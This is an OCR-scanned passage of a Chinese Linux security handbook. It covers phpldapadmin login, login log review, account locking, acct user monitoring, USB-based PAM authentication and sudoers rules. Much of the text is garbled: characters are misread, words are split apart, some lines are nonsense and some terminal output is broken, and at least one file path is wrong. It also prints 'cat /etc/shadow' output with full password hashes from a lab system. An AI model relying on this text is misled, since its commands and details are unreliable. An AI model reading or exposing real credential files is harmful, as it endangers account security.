23.phpldapadmin 页 面 打开 之 后 ， 在 页 面 左 边 可 以 找到 login (登录 ) 链接 ， 单 击 它 会 出 现 一 个 登录 提示 : 


Authenticate to server My LDAP Server 


Anonymous L 


| Authenticate | 


24. 如 果 phpldapadmin 已 经 被 正确 配置 了 ， 那 么 在 登录 界面 会 出 现 正 确 的 Login DN 信息 。 在 本 例 中 应 该 是 : 


cn=admin，dc=example，dc=com。 


25. 如 果 正 确 输入 了 党 理 员 密码 ， 则 管理 界面 会 打开 ， 如 下 图 所 示 : 


&Ephp 

-LDAP H 
saümin D9 
Home | Purge caches | Show Cache 


局 My LDAP Server C9 B Q Authenticate to server 


! Successfully logged into server. 
c) 90g e 


schema search refresh info import export logout 
Logged in as: cn-acdmin 


rn iin Sphp 
LDAP 
zaudmin 


Use the menu to the left to navigate 


26. 在 党 理 界面 元 人 出， 你 可 以 看 见 域 组 件 的 地 方 (dc=example，dc=com) , RADA "4" 5. AS RHBUIETEBSRBRS 


登录 账号 : 


Eu P 
admin 


Home | Purge caches | Show Cache 
局 My LDAP Server © 


下 B eolts G A 


import export logout 


schema search refresh info 
Logged in as: crn-acdmin 


-F cn-admin 
E. Create new entry here 


原理 解析 
在 上 面 的 操作 中 ， 首 移 创 建 了 一 个 Ubuntu 服务 器 ， 在 该 服务 器 上 安 半 了 slapd 软 件 包 。 完 成 局 后 ， 又 安 和 了 附加 的 工具 


包 。 最 后 ,按照 需求 重新 配置 了 LDAP。 


在 完成 重新 配置 后 ， 安 装 了 能 通过 Web 接 口 管理 LDAP 服 务 器 的 phpldapadmin 软 件 包 。 


本 章 将 讨论 如 下 主题 : 
- 用 户 认证 和 日 志 记 录 


: 限制 用 户 的 登录 能 力 


: 使 用 acct 监 视 用 户 行 为 


第 4 音 ”Linux 的 本 地 认证 


使 用 USB 设 备 和 PAM 的 登录 认证 


:定义 用 户 授权 控制 


4.1 


用 户 认 证 的 一 个 主要 功能 融 是 监视 系统 的 用 户 。 有 多 种 万 法 跟踪 了 解 那些 试图 登录 Linux 系 统 的 用 户 的 情况 ， 无 论 他 们 是 否 


登录 成 功 。 


准备 工作 


用 尸 认 证 和 日 志 记 录 


Linux 系 统 维护 着 一 个 记录 所 有 来 自 不 同 账号 的 登录 安 试 的 日 志文 件 。 这 些 日 志文 件 存 放 在 /var/log/ 目 录 下 。 


rootükali:-£2 ls /var/log/ 


alternatives.log 


dmesg. 1. gz 
dmesg. 2. gz 


root@kali:-# i 


操作 指南 


dmesg. 3. qz 
dmesg,., 4. qz 
dpkg.Log 
dradis 


exim4 

faillog 
fontconfig.log 
fsck 

gdm3 

installer 
kern.log 
lastlog 
lpr.log 
mail.err 


mail.info 
mail.log 
mail.warn 
messages 


mysql 
mysql.err 
mysql .log 


nginx 

ntpstats 

openvas 
pm-powersave.lag 
postgresql 


pycentral.log 
samba 
speech-dispatcher 
stunnel4 


syslog 
syslog.1 
user.log 

wtmp 
wvdialconf.Llog 
Xorg.. Log 
Xorg.O.Llog.old 


Linux 系 统 的 管理 员 可 以 采用 图 形 界 面 或 命令 行 方式 查看 这 些 日 志 信 息 : 
1. 如 果 想 查看 特定 账号 的 错误 登录 尝试 ， 比 如 查看 root 账 号 ， 可 以 使 用 如 下 命令 : 
lastb root 


root@kali:-~-# Lastb 
root tty/ :O Sat Nov 28 13:47 - 13:4/ (00:00) 


btmp begins Sat Nov 28 13:4/:02 2015 
rootükali:-4 BB 


2. 可 以 使 用 dmesg 命 令 在 终端 查看 日 志 信息 。 这 个 命令 可 以 显示 出 在 内 存 中 缓存 的 Linux 内 核 信息 ， 如 下 图 所 示 : 


[ 09.395361] vgaarb: device added: PCI:0000:00:0f.0,decodes-io-4mem,owns-io-«mem 
, Locks=none 

vgaarb: loaded 

vgaarb: bridge control possible 0000:00:0f.0 

PCI: Using ACPI for IRQ routing 

PCI: pci cache line size set to 64 bytes 

e820: reserve RAM buffer [mem OxOOOSf&8OO0-OxGOOSffff] 

e820: reserve RAM buffer [mem OxlfefOOOQO-Oxlfffffff] 

HPET: 16 timers in total, O timers will be used for per-cpu timer 

nost: at MMIO Oxfed00000, IRQs 2, 8, 0, 6, 0, O0, 6, O, O, O0, D, 


hpetO: 16 comparators, 64-bit 14.318180 MHz counter 

Switched to clocksource hpet 

pnp: PnP ACPI init 

ACPI: bus type PNP registered 

system 00:00: [io Ox1000-0x103f] could not be reserved 
00:00: [io Oxl1040-Ox104f] has been reserved 
00:00: [io OxOcfO-OxOcfl] has been reserved 
00:00: Plug and Play ACPI device, IDs PNPOcO2 (active) 
:91: [dma 4] 


root(ükali:-£ dmesg | grep USB 
1./50160] ACPI: bus type USB registered 
./50516] ehci hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver 


./50698] ehci-pci 0000:02:03.0: new USB bus registered, assigned bus numbe 


uhci hcd: USB Universal Host Controller Interface driver 

ehci-pci 0000:02:03.0: USB 2.0 started, EHCI 1.00 

usb usbl: New USB device found, idVendor-1d6b, idProduct-0002 

usb usbl: New USB device strings: Mfr=3, Product-2, SerialNumber- 


. 762584] hub 1-0:1.0: USB hub found 
1./63165] uhci hcd 0000:02:00.0: new USB bus registered, assigned bus numbe 


. 763627] usb usb2: New USB device found, idVendor-1d6b, idProduct=0001 
. 763632] usb usb2: New USB device strings: Mfr-3, Product-2, SerialNumber- 


ped -m om p 7 jer mom rn 


4. 如 果 想 在 某 个 日 志文 件 中 只 查看 10 条 距 当 前 时 间 最 近 的 信息 而 个 是 所 有 日 志 信 息 ， 可 以 使 用 如 下 命令 : 


root@kall:~# tail -n 10 /var/log/auth.log 

Dec 17 22:28: kali sudo: pam unix(sudo:session): session closed for user root 

Dec 1/ 22:39: kali CRON[19130]: pam unix(cron:session): session opened for user root 
by (uid-0) 

Dac Lr 4274 kali CRON[19130]: 
Dec 17 23:09: kali CRON[19936]: 
by (uid-0) 

Dec 17 23:09: kali CRON[19936]: 
Dac 1 Sr kali CRON[20993]: 
by (uid-z0) 

Dec 17 23:17: kali CRON[20993]: 
Dec 17 23:39: kali CRON[21011]: 
by (uid-0) 

DOC IAr 3M kali CRON[21011]: 


session closed for user root 
session opened for user root 


pam unix(cron:session): 
pam unixí(cron:session): 


session closed for user root 
session opened for user root 


pam unix(cron:session): 
pam unixí(cron:session): 


session closed for user root 
session opened for user root 


pam unix(cron:session): 
pam unix(cron:session): 


pam unix(cron:session): session closed for user root 


Dec 17 23:55:07 kali gnome-screensaver-dialog: gkr-pam: unlocked login keyring 
root(ükaLli:- i 


在 上 面 的 命令 中 ，“-n” 选 项 指明 显示 日 志 信 息 的 行 数 (上 例 中 为 10) 。 


5. 如 果 想 查看 最 近 的 某 用 户 账 号 的 登录 信息 ， 则 使 用 last 工 具 ，。 


rootükali:-£ last 


root pts/2 still logged in 


root pts/1 
root pts/Q 
root pts/1 
root pts/1 
root pts/0O 
root tty/ 

(unknown tty/ 

reboot system boot 3.1 
root pts/0O 
root pts/O 
root tty/ 

(unknown tty/ 
reboot system boot 3.12-kalil-486 


CO CO CO CO CO C2 CO C2 


-kalil-486 


O O 0O OO 
© © N 


last 工 具 将 /etc/log/wtmp 文 件 按照 某 种 格式 显示 出 来 。 
6. 如 果 想 查看 所 有 用 户 最 后 一 次 登录 系统 的 信息 ， 可 以 使 用 lastlog 命 令 : 


stunnel4 
statd 

sslh 
Debian-gdm 
rtkit 
saned 
userl 
user2 
user3 


still Logged in 
still logged in 


22:44 
12:03 


(99:13) 
(00:09) 


22:44 (1+20:36) 
still logged in 


02:07 


down 
02:45 
down 
02:35 


logged 
logged 
logged 
logged 
logged 
logged 
logged 
logged 
logged 


原理 解析 


Linux 系 统 使 用 不 同 的 日 志文 件 记录 不 同类 型 的 信息 。 可 以 根据 实际 需求 使 用 上 面 的 命令 查看 所 需要 的 日 志 。 每 一 个 命令 会 


显示 不 同类 型 的 详细 信息 。 


4.2 限制 用 尸 的 登录 能 

Linux 系 统管 理 员 的 一 项 重要 职责 就 是 配置 、 管 理 用 户 和 组 ， 同 时 也 有 检查 所 有 用 户 登录 能 力 的 任务 。 
准备 工作 

下 面 给 出 的 操作 步骤 都 是 在 Ubuntu 系 统 上 进行 的 ， 用 户 也 可 以 按照 这 些 步骤 在 其 他 Linux 发 行 版 本 上 实验 。 
操作 指南 


接 下 来 的 操作 步骤 将 展示 如 何在 Linux 系 统 中 限制 用 户 的 登录 能 


1. 可 以 通过 把 /etc/passwd 文 件 中 用 户 的 登录 shell 修 改 为 特殊 值 来 限制 用 户 的 访问 。 以 用 尸 sslh 为 例 ， 碍 看 /etc/passwd 又 
件 中 该 用 己 的 细节 信 息 : 


cat /etc/passwd | grep sslh 


rootükali:-4 cat /etc/passwd | grep sslh 
SS5Lh:x:122:133: ;/nonexistent :/bin/false 


root(ükali:-4 四 


2. 在 上 面 给 出 的 细节 信息 中 ， 用 户 sslh 的 最 后 一 个 值 被 设置 为 /bin/false。 如 果 现 在 以 root 身 份 党 试 登录 sslh 用 户 ， 可 以 看 到 
登录 失败 : 


su sslh 
3. 所 以 ， 如 果 和 希望 限制 某 个 账号 登录 ， 可 以 按照 如 下 操作 进行 更 改 : 


root(ükali:-4€ usermod -s /usr/sbin/nologin userl 
rootükali:-4£ su userl 


[his account is currently not available. 
rootükali:-£ B 


4. 另 一 个 限制 用 户 访问 的 万 法 是 使 用 /etc/shadow 文 件 。 如 果 使 用 cat 合 令 查 看 这 个 文件 的 详细 信息 ， 可 以 得 到 如 下 结果 : 


rootükali:-4€ cat /etc/shadow 

root :$6$0w9WRucb5$ldas/kVEO40xeKnzBTWvt4IKMIQN2a5/eQlxfKWC.6Hnsl19UNZVnj OKNt87CHOiiz2dq00 
KlFUsVJBKvGM7Ri1:16079:0:99999:7::: 

daemon:*:160/8:0:99999:7::: 


Din:*:1650/B8:0:499999:7:;: 
Sys:* :1650/8:0:99999:7::: 
sync :*:16078:0:99999:7::: 
games:*:16078:0:99999:7::: 


5. 重 点 查看 用 户 user1 的 详细 信息 ， 如 下 图 所 示 : 


Debian-qdm:*:160/8:0:99999:/::: 
Ptkit:™":16078:0 999997: Cr 
saned:*:16078:0:99999:7::: 


userl1:$6$2iumTg65$CX .Pp9tKFwMoFxcV5zINsPeSpETZE .MhLdyyoojxxLeROg9MC6p . DkvDE2pyj 7I1.u6qR 
LldocxZYOl1lx41m9G0.:16/85:0:999998:7::: 


6. 输 出 信息 显示 了 用 户 user1 的 口令 的 哈 希 值 (以 “$6$2iumTg65$9” 开 头 ， 到 后 面 第 一 个 “: ”截止 的 那 部 分 ) 。 除 此 之 
外 ， 还 可 以 看 到 一 些 系 统 用 户 (如 debian-gdm 等 ) 没有 口令 的 哈 希 值 ， 而 由 星 号 “*” 代 蔡 。 


7. 可 以 使 用 如 下 命令 来 锁定 用 户 user1， 使 其 无 法 登录 : 


passwd -1 userl 


root(ükali:-£ passwd -l userl 
passwd: password expiry information changed. 


root(ükal i:- p 


8. 表 次 查看 文件 /etc/shadow 中 user1 的 信息 。 可 以 看 到 用 户 的 口令 信息 变 成 以 “! ”开头 的 不 合法 值 了 。 
cat /etc/shadow | grep user1 


root(ükali:-£€ cat /etc/shadow | grep userl 
userl:!$65$2iumTg65$CX.Pp9tKFwMoFxcV5zINsPeSpETZE .Mhldy/ooj xXLeROg9MC6p . DkvDE2py j 7I1.u6q 
RLdocxZY01x41m9G0.:16785:0:99999:7::: 

root(ükali:-4 


9. 可 以 使 用 如 下 指令 解锁 该 账号 
passwd -u userl 


root@kali:~# passwd -u userl 
passwd: password expiry information changed. 


root@kall:=~# i 


10. 如 果 想 查看 某 个 用 户 账 号 是 否 被 锁定 ， 可 以 使 用 如 下 命令 : 


root(ükali:-£4 passwd -S userl 
user] L 12/16/2015 © 99999 7 -1 
rootükali:-4 passwd -S user2 


让 
root(ükali:-4 i 


在 上 面 的 输出 结果 中 可 以 看 到 ， 账 号 user1 被 锁定 ， 在 它 后 面 的 第 二 个 参数 中 用 “L” 表 示 了 出 来 。 账 号 user2 的 第 二 个 参数 
为 “P”， 表 示 它 没有 被 锁定 。 


1. 也 可 以 使 用 usermod 命 令 来 完成 锁定 或 解锁 某 个 账号 的 操作 。 使 用 usermod 命 令 ， 可 以 按 如 下 操作 来 锁定 某 个 账号 : 
usermod -L userl 
2. 使 用 usermod 命 令 ， 可 以 按 如 下 操作 来 解锁 某 个 账号 : 


usermod -U userl 


原理 解析 


对 于 Linux 系 统 中 的 每 一 个 账号 来 说 ， 账 号 的 详情 信息 都 人 存储 于 文件 etc/passwd 和 /etc 人 /shadow 中。 这 些 信息 指明 了 用 己 账 
号 可 以 实施 哪些 行为 。 只 要 修改 这 些 文件 中 账号 的 详情 信息 ， 束 能 够 控制 这 些 账 号 的 行为 。 


在 前 面 的 内 容 中 ， 我 们 展示 了 如 何 通过 修改 文件 来 锁定 或 解锁 用 户 账 号。 


4.3 ”使 用 acct 监 钢 用 户 行为 


acct 是 一 个 可 以 在 Linux 系 统 上 用 于 监视 用 户 活动 的 开源 应 用 。 它 运行 在 后 台 ， 奶 踩 记 录 所 有 用 户 的 所 有 活动 ， 并 跟踪 系统 
资源 的 使 用 情况 。 


准备 工作 


要 使 用 acct， 首 先 需 要 运行 如 下 命令 在 Linux 系 统 上 安装 软件 包 : 


apt-get install acct 


root@kali:~-# apt-get install acct 
Heading package lists... Done 
Building dependency tree 
Reading state information... Done 
Ihe following NEW packages will be installed: 
acct 
© upgraded, 1 newly installed, © to remove and 2 not upgraded. 
Need to get 108 kB of archives. 
After this operation, 369 kB of additional disk space will be used. 
WARNING: Ihe following packages cannot be authenticated! 
acct 
Install these packages without verification [y/N]? E 


如 果 上 述 方 法 不 起 作用 ， 那 么 可 以 访问 http://packages.ubuntu.com/precise/admin/acct， 手 动 下 载 软件 包 。 


1. 下 载 软件 包 之 后 ， 需 要 将 其 解压 到 荣 个 目录 下 ， 比 如 解压 到 桌面 上 : 


root@kali:~/Desktop# ls 
acct 6.5.5.0rig.tar.gz 
root(ükali:-/Desktop£ clear 


rootükali:-/Desktop£ tar -zxvf acct 6.5.5.o0rig.tar.gz 
acct-6.5.5/ 

acct-6.5.5/m4/ 

acct-6.5.5/m4/include next .m4 
acct-6.5.5/m4/asm-underscore.m4 

acct -6.5.5/m4/stdint.m4 

acct-6.5.5/m4/unistd h.m4 

acct-6.5.5/m4/rmdir.m4 


root(ükali:-/Desktop£ cd acct-6.5.5/ 

root(ükali:-/Desktop/acct-6.5.54 ls 

BT ChangeLog dev hash.c install-sh ndate-sh uid hash.c 
ac.c common .c dev hash.h  last.1 missing uid hash.h 
accounting.info  common.h dump-acct.c Last .< NEWS utmp rd.c 
accounting.texi  config.guess dump-utmp.8 Lastcomm .1 pacct rd.c utmp rd.h 
accton.8 config.h dump-utmp.c  Lastcomm.c pacct rd.h version.h.in 
accton.c comro n amie T EUR see lib README version.texi 
aclocal.m4 config.sub fite rd: h linux-acct.h  sa.8 warn-on-use.h 
al share.cpp configure files.h.i ltmain.sh Sa .C 

arg-nonnull.h configure.ac  hashtab. m4 stamp-vti 

AUTHORS COPYING hashtab. Makefile.am texinfo.tex 

c++defs .h depcomp INSTALL Makefile.in TODO 


3. 接 下 来 ， 运 行 configure 脚 本 配置 软件 包 。 


rootükali:-/Desktop/acct-6.5.54£ ./configure 


checking 
checking 
checking 
checking 
checking 
checking 


checking 
checking 
checking 
checking 
checking 
checking 
checking 
checking 
checking 
checking 
checking 
checking 


build system type... i686-pc-linux-gnu 

host system type... i686-pc-linux-gnu 

target system type... i686-pc-linux-gnu 

for a BSD-compatible install... /usr/bin/install 
yes 
/bin/mkdir -p 


$^ 


whether build environment is sane... 
for a thread-safe mkdir -p... 


for gawk... no 
for mawk... mawk 


whether make sets $(MAKE)... yes 


whether to enable maintainer-specific portions of Makefiles... 


ORTH 

whether the C compiler works... yes 

for C compiler default output file name... 
for suffix of executables... 

whether we are cross compiling... no 

for suffix of object files....o 

whether we are using the GNU C compiler... yes 
whether gcc accepts -g... yes 


a.out 


4. 配 置 完 成 乙 后 ， 运 行 make 命 令 : 


root(ükali:-/Desktop/acct-6,5.54 make 


make 


Making 


make[2] : 


all-recursive 
make[1]: 


Entering directory "/root/Desktop/acct-6.5.5' 
all in liD 


Entering directory /root/Desktop/acct-6.5.5/lib' 


5. 执 行 make install 命 令 安装 软件 : 


root(ükali:-/Desktop/acct-6.5.54£ make install 
Making install in lib 


make[1]: 
make 
make[2] 


Entering directory '/root/Desktop/acct-6.5.5/lib' 


install-recursive 

: Entering directory 
: Entering directory 
: Entering directory 
: Nothing to be done 
: Nothing to be done 


"/root/Desktop/acct -6 
"/root/Desktop/acct -6 
"/root/Desktop/acct-6.5.5/lib' 
for 'install-exec-am'. 
for 'install-data-am'. 


mos PTD. 


-Eer ue 


: Leaving directory "/root/Desktop/acct -6.5.5/lib' 
: Leaving directory "/root/Desktop/acct-6.5.5/Llib' 


6. 上 述 命令 完成 后 ， 访 程序 成 功 地 安装 在 Linux 系 统 中 。 


操作 指南 


acct 程 序 包 有 多 个 不 同 的 命令 来 监视 进程 的 活动 : 


1. 以 wtmp 文 件 中 记录 的 用 户 登 录 和 退出 信息 为 基础 ， 可 以 使 用 ac 命令 查看 用 户 的 总 登录 时 间 : 


root@kall:~# ac 
total 377.19 
root@kal IL: f 


2. 如 果 想 坦 询 一 天 内 的 全 部 登录 时 间 ， 可 以 使 用 ac 命令 配合 “-d ”选项 : 


root(ükali:-4 ac 
Jan 8 total 
Oct 28 total 
Oct total 


Nov total 
Nov total 
Nov total 
Nov total 
Nov total 
Nov total 
Dec total 
Dec total 
total 
root@kali:~# Į 


3. TAEA TASLAR E]: 


rootükali:-4£4 ac -p 

( unknown ) 

root 

totaL JFL. BS 
root@kalı:=~# É 


4. 如 果 想 查询 某 特定 用 户 的 登录 时 间 信 息 ， 可 以 使 用 如 下 命令 : 


rootükali:-4 ac userl 
total 0.00 
rootükali:-4 ac user2 
totaL 0.00 
root(ükali:-4 ac root 
totaL 3/0.79 
root(kali:-4 


5.BJLAMfs&Fdlastcommáp S £ufHrt3 FH RRR EAA BUB GB S : 


root@kali:-# Lastcomm root 
root 
root 
root 
root 
root 
root 


root 
root 
root 
root 
root 
root 
root 


CO CO C2 C2 CO CO CO CO C2 C2 C2 CO CO 


原理 解析 


在 Linux 系 统 上 安装 acct 软 件 包 是 对 系统 实施 监控 的 前 提 。 对 于 一 些 Linux 友 行 版 本 ， 如 果 acct 不 兼容 的 话 ， 建 议 使 用 
psacct。 当 这 个 工具 在 Linux 系 统 上 安装 并 运行 之 后 ， 它 就 开始 对 系统 上 的 各 种 活动 进行 监视 。 可 以 使 用 上 面 介绍 的 命令 来 查看 


这 些 监视 日 志 信 息 。 


4.4 使 用 UsB 设 备 和 PAM 的 登录 认证 


当 Linux 用 尸 想 确保 系统 安全 时 ， 最 常用 的 做 法 就 是 使 用 登录 口令 。 但 是 这 种 方法 不 大 可 靠 ， 因 为 当前 有 很 多 方法 可 以 破解 
传统 的 口令 。 为 了 增加 安全 性 ,我 们 可 以 使 用 一 个 USB 设 备 作 为 登录 系统 时 的 认证 信 令 


准备 工作 


为 完成 下 面 的 操作 步 又， 我 们 需要 有 一 个 USB 和 存储 设备 ， 并 在 Linux 系 统 中 下 载 安 竣 可 插入 认证 模块 (PAM) 。 大 部 分 
Linux 系 统 的 预 编译 软件 包 中 已 经 包括 了 这 个 模块 ， 可 以 通过 相关 的 资源 库 进行 访问 。 


操作 指南 


使 用 任何 USB 存 储 设 备 和 PAM 之 前 ， 都 要 创建 认证 信 令 。 


1. 首 先 要 安装 PAM USB 认 证 软件 包 。 执 行 如 下 命令 : 


$ sudo apt-get install pamusb-tools libpam-usb 


tajindergtajinder-dev-machine:-S sudo apt-get install pamusb-tools libpam-usb 
[sudo] password for tajinder: 
Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
The following extra packages will be installed: 
pamusb-common pmount 
Suggested packages: 
cryptsetup 
The following NEW packages will be installed: 
libpam-usb pamusb-common pamusb-tools pmount 
0 upgraded, 4 newly installed, 0 to remove and 327 not upgraded. 
Need to get 148 kB of archives. 
After this operation, 1,059 kB of additional disk space will be used. 
Do you want to continue [Y/n]? y 
WARNING: The following packages cannot be authenticated! 
pamusb-common pmount libpam-usb pamusb-tools 
Install these packages without verification [y/N]? y 
Get:1 http://in.archive.ubuntu.com/ubuntu/ precise/universe pamusb-common i386 6. 
5.0-3 [32.5 kB] 
Get:2 http://in.archive.ubuntu.com/ubuntu/ precise/universe pmount 1386 0.9.23-2 
[97.2 kB] 


2. 安 装 完成 后 ， 需 要 配置 USB 设 备 与 PAM 认 证 协同 工作 。 可 以 通过 执行 命令 或 者 编辑 /etc/pamusb.conf 文 件 的 方式 来 完成 
配置 。 


3. 在 使 用 命令 万 式 时 ， 首 先 要 连接 USB 设 备 ， 然 后 执行 如 下 命令 : 


$ sudo pamusb-conf --add-device usb-device 


执行 结果 如 下 图 所 示 : 


tajinder@tij-dev:~$ sudo pamusb-conf --add-device usb-device 
Please select the device you wish to add. 
* Using "SanDisk Cruzer Blade (4C5300081271007108431)" (only option) 


Which volume would you like to use for storing data ? 
* Using "/dev/sdbi1 (UUID: 98F9-1155)" (only option) 


usb-device 

SanDisk 

Cruzer Blade 
4C5300012710087108431 
90F9-1155 


Save to /etc/pamusb.conf ? 
[Y/n] y 

Done. 

tajindergtj-dev:-S B 


在 上 面 的 命令 行 中 ，usb-device 是 当前 正在 使 用 的 USB 设 备 的 名 称 。 这 个 名 称 可 以 是 用 户 给 定 的 任何 名 字 。 


当 执 行 pPBamsub-conf 命 令 时 ， 系 统 自动 友 现 USB 设 备 和 它 的 多 个 分 多。 命令 执行 完 之 后 ， 会 在 /etc/pamusb.conf 文 件 中 加 
入 一 个 XML 代码 块 来 定义 这 个 USB 设 备 。 


«!-- Device settings --> 
«devices» 
«!-- Example: 
Note: You should use pamusb-conf to add devices automatically. 
«device id-"MyDevice"» 
«vendor»SanDisk Corp.«/vendor» 
«model»Cruzer Titanium«/model- 
«serial 2SNDKXXXXXXXXXXXXXXXX« /serial2 
«volume uuid»6F6B-42FC«/volume uuid» 
«option name-"probe timeout"»10«/option- 
«device» 
-= 
«device id="usb-device"> 
«vendor»SanDisk«/vendor» 
«nodel»Cruzer Blade</model> 
«serial»4C530001271007108431«/serial» 
«volume uuid»98F9-1155«/volume uuid» 
«/device»«/devices- 


4. 下 一 步 ， 定 义 USB 设 备 : 
$ sudo pamusb-conf --add-user userl 


执行 结果 如 下 图 所 示 : 


tajinder@tj-dev:~$ sudo pamusb-conf --add-user useri 
Which device would you like to use for authentication ? 
* Using "usb-device" (only option) 


useri 
usb-device 


如 果 访 用户 已 经 存在 ， 它 将 被 加 入 PAM 的 配置 中 去 。 


上 面 的 命令 将 在 /etc/pamusb.conf 文 件 中 添加 pam_usb 用 户 定 义 。 


«user id-"tajinder"- 
«device»usb-device«c/device» 
«/user»«user id-"user1"» 


«device»usb-device«c/device» 
«/user»«/users- 


5. 下 面 配 置 PAM ， 使 得 在 系统 的 认证 过 程 中 加 入 pam_usb 模 块 。 编 辑 文件 /etc/pam.d/common-auth， 加 入 下 面 这 一 行 : 


auth sufficient pam usb.so 


这 将 使 全 系统 范围 内 的 PAM 库 知道 pam_usb 模 块 。 


“redquired” 选 项 表示 认证 时 必须 输入 正确 的 口令 ， 而 “sufficient” 选 项 表示 也 可 以 通过 USB 设 备 认 证 该 用 户 。 在 上 面 的 
配置 中 ， 我 们 为 USB 设 备 认 证 选择 了 “sufficient” 选 项， 而 为 默认 的 口令 认证 选择 了 “redquired” 选项 。 


当 为 user1 定 义 的 USB 设 备 不 在 系统 中 时 ， 用 户 需要 输入 正确 的 口令 。 要 强制 用 户 同时 使 用 两 种 认证 方式 ， 需 要 


将 “sufficient” 改 为 “required” 。 
6. 现 在 转 到 账号 user1。 


tajinder@tj-dev:~$ su user1 

Password: 
pam usb v0.5.0 
Authentication request for user "useri" (su) 
Device "usb-device" is connected (good). 


Performing one time pad verification... 
Regenerating new pads... 
Access granted. 

useri(itj-dev: /home/tajinderS 


当 出 现 提示 时 ， 连 接 UsB 设 备 。 如 果 正 确 的 USB 设 备 连 接 上 了 ， 登 录 请 求 融会 像 上 图 所 示 一 样 成 功 完 成 ， 人 否则 会 给 出 错误 信 


CI 


7. 如 果 出 现 如 下 错误 ， 可 能 是 USB 设 备 的 路 径 添加 不 正确 。 


Error: device /dev/sdbl is not removable 


* Mount failed 


在 这 种 情况 下 ， 请 在 文件 /etc/pmount.allow 中 添加 USB 设 备 的 完整 路 径 。 


8. 执 行 如 下 命令 查看 USB 设 备 的 分 区 信息 : 


$ sudo fdisk -1 


Disk /dev/sdb: 8004 MB, 8004304896 bytes 

35 heads, 21 sectors/track, 21269 cylinders, total 15633408 sectors 
Units - sectors of 1 * 512 - 512 bytes 

Sector size (logical/physical): 512 bytes / 512 bytes 


I/O size (minimum/optimal): 512 bytes / 512 bytes 
Disk identifier: 0x00000000 


Device Boot Start End Blocks Id System 
/dev/sdb1 32 15633407 7816688 b W95 FAT32 


本 例 中 ，USB 设 备 的 分 区 为 /dev/sdb1。 
9. 现 在 ， 在 文件 /etc/pmount.allow 中 添加 一 行 ， 以 解决 上 面 的 报错 信息 。 


10. 到 目前 为 止 ， 在 文件 /etc/pam.d/common-auth 中 所 做 的 配置 允许 USB 设 备 没有 连接 时 ， 用 户 依然 可 以 通过 使 用 正确 的 
口令 登录 。 如 果 强 制 要 求 用 户 使 用 口令 登录 的 同时 也 要 插入 USB 设 备 ， 则 需要 将 选项 由 “sufficient” 改 为 “required”， 如 下 
图 所 示 : 


[success-1 default-ignore] pam unix.so nullok secure 


required pam usb.soli 


11. 这 时 ， 如 果 用 户 专 试 登录 ， 则 必须 输入 正确 的 口令 并 插入 USB 设 备 。 


tajinder@tj-dev:~$ su user1 

Password: 

* pam usb v6.5.0 
Authentication request for user "useri" (su) 
Device "usb-device" is connected (good). 


Performing one time pad verification... 
Access granted. 
useri(itj-dev:/home/tajinderS exit 
exit 
tajindergtj-dev:-S B 


12. 现 在 移 除 USB 设 备 ， 并 再 次 尝试 输入 正确 的 口令 进行 登录 ， 发 现 登 录 失败 : 


tajinder(ttj-dev:-S su user1 

Password: 

* pam usb v0.5.0 

* Authentication request for user "useri" (su) 
* Device "usb-device" is not connected. 


* Access denied. 
su: Authentication failure 
tajinder(itj-dev:-S b 


在 完成 PAM-USB 软 件 包 安装 之 后 ， 我 们 编辑 配置 文件 ， 添 加 了 USB 设 备 作为 希望 使 用 的 认证 信 令 。 之 后 ， 添 加 用 户 账号 ， 
接 下 来 修改 文件 /etc/pam.d/common-auth， 指 定 USB 认 证 的 工作 模式 ， 即 登录 时 是 否 一 直 使 用 USB 设 备 。 


到 目前 为 止 ， 读 者 已 经 了 解 了 如 何在 登录 时 使 用 USB 设 备 进行 认证 。 除 此 之 外 ， 也 可 以 让 USB 设 备 在 每 次 揪 拔 时 触发 一 个 事 
件 。 
在 /etc/pamusb.conf 文 件 中 修改 XML 人 代码 段 ， 添 加 一 个 用 户 定义 的 事件 代码 : 
- -> 
«user id-"user1"» 
«devicesusb-device 


«/device» 


«agent event-"lock"»gnome-screensaver-command -l«/agent» 


«agent event-"unlock"»gnome-screensaver-command -d«/agent» 


在 计算 机 上 对 用 尸 授 权 进 行 定义 主要 是 确定 是 人 否 人 允许 用 尸 执行 某 项 操作 ， 可 能 是 执行 某 个 程序 或 读 取 某 个 文件 。 


因为 root 账 号 拥有 所 有 权限 ， 所 以 授权 控制 主要 用 来 处 理 普 通用 户 是 否 具 有 root 访 问 权限 。 


准备 工作 

为 了 了 解 用 户 授权 如 何 工 作 ， 需 要 建立 用 户 账号 来 进行 实验 。 所 以 ， 我 们 创建 user1 和 user2 两 个 账号 来 皖 试 执行 命令 操 
作 。 
操作 指南 


本 书 我 们 将 对 用 己 账 号 的 各 种 授权 控制 都 尝试 一 下 。 


1. 假 设 有 user1 和 user2 两 个 账号 。 我 们 从 user2 登 录 ， 并 尝试 以 user1 身 份 执 行 ps 命 令 。 正 常情 况 下 ， 会 得 到 如 下 图 所 示 的 


root@kall:~# su user2 
$ whoami 

user? 

$ sudo -u userl ps 


We trust you have received the usual lecture from the local System 
Administrator. It usually boils down to these three things: 


#1) Respect the privacy of others. 
#2) Ihink before you type. 
#3) With great power comes great responsibility. 


[sudo] password for user2: 
Sorry, user user2 is not allowed to execute '/bin/ps' as userl on kali. 


$i 


2. 现 在 ,编辑 /etc/sudoers 文 件 ， 并 添加 如 下 一 行 : 


User2 ALL = (userl) /bin/ps 


3.[&fz/etc/sudoersX.f/FZ E, BEXzAuser2l/Auser1 EH tt psip S : 


root@kali:~# su user2 


$ sudo -u userl ps 

[sudo] password for user?2: 
MID [IY {IME CMD 

30636 pts/0 00:00:00 ps 


t 


4. 如 果 想 再 次 从 user2 以 user1 身 份 运行 相同 的 命令 不 会 被 询问 口令 ， 需 要 修改 文件 /etc/sudoers， 如 下 图 所 示 : 


root ALL-(ALL:ALL) ALL 
user2 ALL = (userl) NOPASSWD:  /bin/psg 


5. 现 在 ， 当 我 们 从 user2l 人 user1 身 份 执行 ps 命令 时 ， 可 以 看 到 不 再 提示 输入 口令 了 : 


root(ükali:-4 su USer2 
$ whoami 
user? 
$ sudo -u userl ps 
PID TTY TIME CMD 
31782 pts/0O 00:00:00 ps 


$t 


6. EXRIR ERIS S ATERS RHN T o S BEAT NIBLANDT S. BRRR ER ERKbH Tsudosp S MAE 


提示 输入 口令 。 


7. 执 行 如 下 命令 在 文件 /etc/sudoers 中 加 入 一 行 ， 使 User1 账 号 在 执行 Sudo 时 总 是 会 提示 输入 口令 : 
Defaults:userl timestamp timeout = 0 


Defaults:userl timestamp timeout = 


# Host alias specification 
# User alias specification 
